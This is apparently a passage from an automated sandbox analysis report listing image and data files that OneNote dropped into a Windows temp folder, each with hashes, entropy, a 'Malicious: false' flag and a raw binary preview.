SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{DB80F4BF-E55A-4BE2-9019-1085B82FB696}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{DBFE7029-4370-41DF-8FFA-0A9B487F56FE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Temp\{DD25EB00-2A4C-4DA8-9BD6-B1BA63AA4239}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{DD398BD5-1138-459F-AD0C-96D91F303C74}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{DE326023-40C0-4BCC-A157-23ADEAE9C302}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Temp\{DFEBC249-50EB-49F7-96E6-0E15AF7429BB}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{E0A604A6-AB2E-4F03-B4C3-2D1C66CA017B}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{E1810D19-9E0F-4C25-B632-C234EBD38B44}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{E2C1AF7E-FBD6-4582-93D2-C8894E734E4A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{E47AB987-919B-490E-A358-F7D6FE27DC52}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{E47EFC73-6089-41D7-9F98-4C057E6982A3}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Temp\{E4F0F48C-55B4-4902-825F-2DCABF6DA505}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{E5484C51-516E-4532-92F7-949B3B947EF6}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{E7097FF6-54B2-4C46-819E-996FB622C63A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6419187598329495
Encrypted:	false
SSDEEP:	6:Ra6dOXFYyfB3h1RRXUnfSgMKYNxoOHKv0WGLWJRujlw//0lweI/wW7Rujd:Ra6dOVYyf9/UfSRboOEN+Wf/NS
MD5:	67B1225E620637A0CDF9A40F6514371D
SHA1:	7587661F5471B41EC2F6C363F4EA26C73B096EE2
SHA-256:	60C41CF376B73359783D2306BFD28F79B34041273BB7C7CFCEFC4D04249F6339
SHA-512:	83B0276A4904119F4CC81AEA0770B4A6AFBCB438A2C360D91F6AA3B232A41C6D5CFA8512D31A9F6FDB46A79F8FC8A6CEDD7AAC41EE0154A63608669C11BA6B19
Malicious:	false
Preview:	./.C..vL....W"v_J....X.N...'.m.;................?.....I...............................................................................................................h..............................................o\|.<M.n...}q...........A....A..b..................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{E730FF2E-6F0D-4110-AE2D-F59C0584DD74}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
